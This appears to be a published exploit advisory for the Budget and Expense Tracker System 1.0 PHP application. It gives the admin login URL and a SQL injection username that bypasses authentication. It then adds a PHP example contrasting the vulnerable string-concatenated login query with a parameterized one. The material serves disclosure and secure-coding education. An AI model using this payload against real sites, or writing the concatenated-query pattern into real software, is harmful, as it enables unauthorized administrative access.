Budget and Expense Tracker System 1.0 Authenticated Bypass

2021.09.20
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass
# Exploit Author: Prunier Charles-Yves
# Date: September 20, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
# Tested on: Linux, Windows
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
Budget and Expense Tracker System 1.0 is prone to an easy authentication bypass vulnerability in the application, allowing the attacker to log in with the admin account.

----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/expense_budget/admin/login.php

Username: admin' or ''=' --
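The username in the PoC has the shape of a SQL injection against a login query built by string concatenation. The following is an added example, not the application's code (the page does not show it): the table, column names, query shape, MD5 comparison and the in-memory SQLite database are assumptions, used to contrast a concatenated login check with a parameterized one.

```php
<?php
// Added example, not the application's source: table, columns and query shape
// are assumptions; in-memory SQLite stands in for the application's database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT UNIQUE, pw_md5 TEXT, pw_hash TEXT)');
$secret = 'constructed-admin-secret'; // constructed sample credential
$db->prepare('INSERT INTO users VALUES (?, ?, ?)')
   ->execute(['admin', md5($secret), password_hash($secret, PASSWORD_DEFAULT)]);

// Concatenated query (assumed legacy pattern): input becomes part of the SQL text.
function login_concat(PDO $db, string $user, string $pass): ?string
{
    $sql = "SELECT username FROM users WHERE username = '$user' AND pw_md5 = '" . md5($pass) . "'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['username'] : null;
}

// Parameterized lookup: input is bound as data, password verified in PHP.
function login_prepared(PDO $db, string $user, string $pass): ?string
{
    $stmt = $db->prepare('SELECT username, pw_hash FROM users WHERE username = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pass, $row['pw_hash'])) {
        return null;
    }
    return $row['username'];
}

$cases = [
    ["admin' or ''=' --", 'anything'],   // username string from the PoC above
    ['admin', 'wrong-password'],
    ['admin', $secret],
];
foreach ($cases as [$u, $p]) {
    printf("%-20s concat=%-8s prepared=%s\n", $u,
        login_concat($db, $u, $p) ?? 'denied',
        login_prepared($db, $u, $p) ?? 'denied');
}
```

In the concatenated form the quote in the username closes the string literal, and because AND binds tighter than OR the `username = 'admin'` term alone satisfies the WHERE clause. The bound form treats the whole string as a username, which matches no row.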


Copyright 2021, cxsecurity.com

 
